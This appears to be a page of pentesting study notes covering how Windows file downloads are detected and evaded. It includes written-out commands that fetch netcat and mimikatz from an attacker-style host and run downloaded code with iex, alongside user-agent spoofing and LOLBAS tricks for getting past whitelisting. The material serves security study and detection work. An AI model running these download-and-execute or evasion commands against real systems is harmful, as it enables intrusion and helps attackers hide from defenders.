Noirchapeau's Gitbook
Noirchapeau
Noirchapeau
  • Welcome to NoirChapeau Gitbook
  • Network Mapping and Security Auditing Tool
  • Footprinting - Enumeration and Information Gathering Notes
    • FTP Pentesting Notes
    • SMB Pentesting Notes
    • SSH Pentesting Notes
    • IPMI Pentesting Notes
    • Oracle TNS Pentesting Notes
    • MSSQL Pentesting Notes
    • MySQL Pentesting Notes
    • SNMP Pentesting Notes
    • IMAP/POP3 Pentesting Notes
    • SMTP Pentesting Notes
    • DNS Pentesting Notes
    • NFS Pentesting Notes
  • Web Reconnaissance Notes
  • Vulnerability Assessment Notes
    • Nessus Vulnerability Scanner Notes
    • OpenVAS (GVM) Vulnerability Scanner Notes
  • File Transfer Techniques for Pentesting
    • Advanced File Transfer Techniques
    • File Transfer Detection & Evasion Techniques
  • Shells & Payloads: Shell Overview
    • Shells & Payloads: Payloads Overview
    • Shells & Payloads: Web Shells Overview
    • Shells & Payloads: Detection & Prevention
  • Metasploit
    • Working with Metasploit Modules
    • Targets and Payloads
    • Encoders & Msfvenom: Advanced Exploitation Techniques
    • Database Management in Metasploit
    • Sessions and Jobs
    • Writing and Importing Custom Modules into Metasploit
    • Firewall and IDS/IPS Evasion
  • Password Attacks
    • Remote Password Attacks
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Files & Archives Cracking
    • Password Management
  • Interacting with Common Services
    • Protocol Specific Attacks
Powered by GitBook
On this page
  • Detection Methods
  • 1. Command Line Detection
  • 2. HTTP Protocol Analysis
  • Common Transfer Methods & Detection Signatures
  • 1. PowerShell Invoke-WebRequest
  • 2. WinHttpRequest
  • 3. Msxml2.XMLHTTP
  • 4. Certutil
  • 5. BITS Transfer
  • Evasion Techniques
  • 1. User Agent Manipulation
  • 2. LOLBAS (Living Off The Land Binaries)
  • Detection & Defense Methodology Checklist
  • Immediate Actions
  • Regular Monitoring
  • Investigation Steps
  • Additional Resources
  1. File Transfer Techniques for Pentesting

File Transfer Detection & Evasion Techniques

Detection Methods

1. Command Line Detection

  • Methodology: Implement whitelisting over blacklisting

  • Key Point: Whitelisting is more time-consuming but provides better security

  • Best Practice: Focus on detecting unusual command-line patterns

2. HTTP Protocol Analysis

  • Focus Area: User Agent String Detection

  • Implementation Steps:

    1. Create whitelist of legitimate user agents

    2. Include common system processes

    3. Document legitimate services (Windows Update, AV)

    4. Configure SIEM for user agent monitoring

Common Transfer Methods & Detection Signatures

1. PowerShell Invoke-WebRequest

# Download Command
Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

# Detection Signature
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

2. WinHttpRequest

# Download Command
$h=new-object -com WinHttp.WinHttpRequest.5.1
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.ResponseText

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

3. Msxml2.XMLHTTP

# Download Command
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.responseText

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

4. Certutil

# Download Commands
certutil -urlcache -split -f http://10.10.10.32/nc.exe
certutil -verifyctl -split -f http://10.10.10.32/nc.exe

# Detection Signature
User-Agent: Microsoft-CryptoAPI/10.0

5. BITS Transfer

# Download Command
Import-Module bitstransfer
Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t
$r=gc $env:temp\t
rm $env:temp\t
iex $r

# Detection Signature
User-Agent: Microsoft BITS/7.8

Evasion Techniques

1. User Agent Manipulation

Listing Available User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Common User Agent Strings

  • Internet Explorer:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)

  • Firefox:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0

  • Chrome:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6

  • Opera:

Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1

  • Safari:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16

Custom User Agent Implementation

# Set Chrome User Agent
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

2. LOLBAS (Living Off The Land Binaries)

  • Purpose: Bypass application whitelisting

  • Example Using GfxDownloadWrapper.exe:

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Detection & Defense Methodology Checklist

Immediate Actions

Regular Monitoring

Investigation Steps

  1. Identify suspicious user agents

  2. Analyze transfer patterns

  3. Cross-reference with whitelist

  4. Document new threat patterns

Additional Resources

PreviousAdvanced File Transfer TechniquesNextShells & Payloads: Shell Overview

LOLBAS Project (Windows):

GTFOBins (Linux):

https://lolbas-project.github.io/
https://gtfobins.github.io/